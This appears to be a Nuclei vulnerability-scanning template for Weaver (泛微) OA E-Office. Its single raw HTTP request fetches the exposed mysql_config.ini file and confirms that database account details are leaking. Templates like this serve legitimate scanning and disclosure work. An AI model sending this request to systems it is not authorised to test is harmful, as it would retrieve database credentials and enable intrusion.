id: fanweiOA-E-Office-mysql-config-ini-leak

info:
  name: 泛微OA E-Office mysql_config.ini 数据库信息泄漏漏洞
  author: cnaq
  severity: medium  
  description: 泛微 E-Office mysql_config.ini文件可直接访问，泄漏数据库账号密码等信息
  reference: 
    - http://wiki.peiqi.tech/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Office%20mysql_config.ini%20%E6%95%B0%E6%8D%AE%E5%BA%93%E4%BF%A1%E6%81%AF%E6%B3%84%E6%BC%8F%E6%BC%8F%E6%B4%9E.html
  tags: fanwei,oa,ini,leak


requests:
  - raw:
      - |
        GET /mysql_config.ini HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
          
      - type: word
        part: body
        condition: and
        words:
          - 'dataurl'
          - 'datauser'


    

